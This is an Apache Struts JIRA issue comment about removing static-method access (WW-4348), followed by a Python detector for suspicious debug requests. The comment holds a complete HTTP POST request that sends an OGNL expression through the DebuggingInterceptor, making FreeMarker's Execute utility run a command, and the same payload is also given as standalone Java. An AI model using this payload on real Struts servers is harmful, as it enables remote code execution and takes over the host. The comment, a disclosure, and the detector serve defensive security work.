[
https://issues.apache.org/jira/browse/WW-4348?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=15809959#comment-15809959
]
Markus Wulftange commented on WW-4348:
--------------------------------------
No, this can be specified wherever OGNL expressions are evaluated. For example, [via the DebuggingInterceptor|http://www.pwntester.com/blog/2014/01/21/struts-2-devmode-an-ognl-backdoor/]:
{noformat}
POST /blank-1.0.0/example/HelloWorld.action HTTP/1.1
Host: 127.0.0.1:8080
Content-Type: application/x-www-form-urlencoded
Content-Length: 670
debug=command&expression=%23application["freemarker.Configuration"]["objectWrapper"].newInstance(
%23context["com.opensymphony.xwork2.dispatcher.ServletContext"].classLoader.loadClass("freemarker.template.Template"),
{
%23application["freemarker.Configuration"]["objectWrapper"].wrap(""),
%23application["freemarker.Configuration"]["objectWrapper"].wrap("<%23assign+ex%3d\"freemarker.template.utility.Execute\"%3fnew()>${ex(\"xterm\")}"),
%23application["freemarker.Configuration"]["objectWrapper"].wrap(%23application["freemarker.Configuration"])
}
).process(
null,
%23context["com.opensymphony.xwork2.dispatcher.HttpServletResponse"].getWriter()
)
{noformat}
By the way, the given OGNL expression is equivalent to the following standalone
code:
{noformat}
new Template(
    "",
    "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"xterm\")}",
    Configuration.getDefaultConfiguration()
).process(
    null,
    new PrintWriter(System.out)
);
{noformat}
> Remove access to static methods
> -------------------------------
>
> Key: WW-4348
> URL: https://issues.apache.org/jira/browse/WW-4348
> Project: Struts 2
> Issue Type: Improvement
> Components: Core Actions
> Affects Versions: 2.3.16.3
> Reporter: Lukasz Lenart
> Priority: Critical
> Fix For: 2.5.x
>
>
--
This message was sent by Atlassian JIRA
(v6.3.4#6332)
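The request in the comment above drives the DebuggingInterceptor through two ordinary request parameters, so it can be spotted in traffic before the application ever evaluates it. The following detector is an added example for defenders, not code from the issue or from Struts; the request records at the bottom are constructed, and the marker list is taken from the expression shown in the comment.

```python
"""Flag HTTP requests that invoke the Struts 2 DebuggingInterceptor's
debug=command mode with an OGNL ``expression`` parameter.
Added defensive example; the request records at the bottom are constructed."""
from urllib.parse import parse_qs

# Names that appear in the expression quoted in the comment and that a
# legitimate client has no reason to send as a request parameter.
OGNL_MARKERS = (
    "#context",        # value-stack context (servlet objects, dispatcher)
    "#application",    # ServletContext attribute map
    ".classLoader",
    "freemarker.template.utility.Execute",
)


def _collect_params(target: str, body: str) -> dict:
    """Merge query-string and form-body parameters: the interceptor reads
    request parameters, so either carrier works."""
    params = parse_qs(target.partition("?")[2], keep_blank_values=True)
    for name, values in parse_qs(body, keep_blank_values=True).items():
        params.setdefault(name, []).extend(values)
    return params


def inspect_request(method: str, target: str, body: str = "") -> dict:
    """Return {'suspicious': bool, 'findings': [...]} for one request.
    Any 'debug' parameter deserves a look (the interceptor only honours it
    when struts.devMode is true, so seeing it act is itself a misconfiguration);
    debug=command together with expression is the pattern from this issue."""
    params = _collect_params(target, body)
    findings = []
    modes = params.get("debug", [])
    if modes:
        findings.append("debug parameter present: " + ",".join(modes))
    if "command" in modes and "expression" in params:
        findings.append("debug=command with expression: server-side OGNL evaluation")
    for expr in params.get("expression", []):  # parse_qs already percent-decodes
        hits = [m for m in OGNL_MARKERS if m in expr]
        if hits:
            findings.append("expression references " + ", ".join(hits))
    return {"suspicious": bool(findings), "findings": findings}


# Constructed sample traffic (not real logs).
SAMPLE_REQUESTS = [
    ("GET", "/blank-1.0.0/example/HelloWorld.action?name=Alice", ""),
    ("GET", "/blank-1.0.0/example/HelloWorld.action?debug=xml", ""),
    ("POST", "/blank-1.0.0/example/HelloWorld.action",
     "debug=command&expression=%23application%5B%22freemarker.Configuration%22%5D"),
]

if __name__ == "__main__":
    for rec in SAMPLE_REQUESTS:
        print(rec[0], rec[1], inspect_request(*rec))
```

Because the body is inspected, this has to run where POST bodies are visible (a WAF or reverse proxy), not on plain access logs, which only carry the query string.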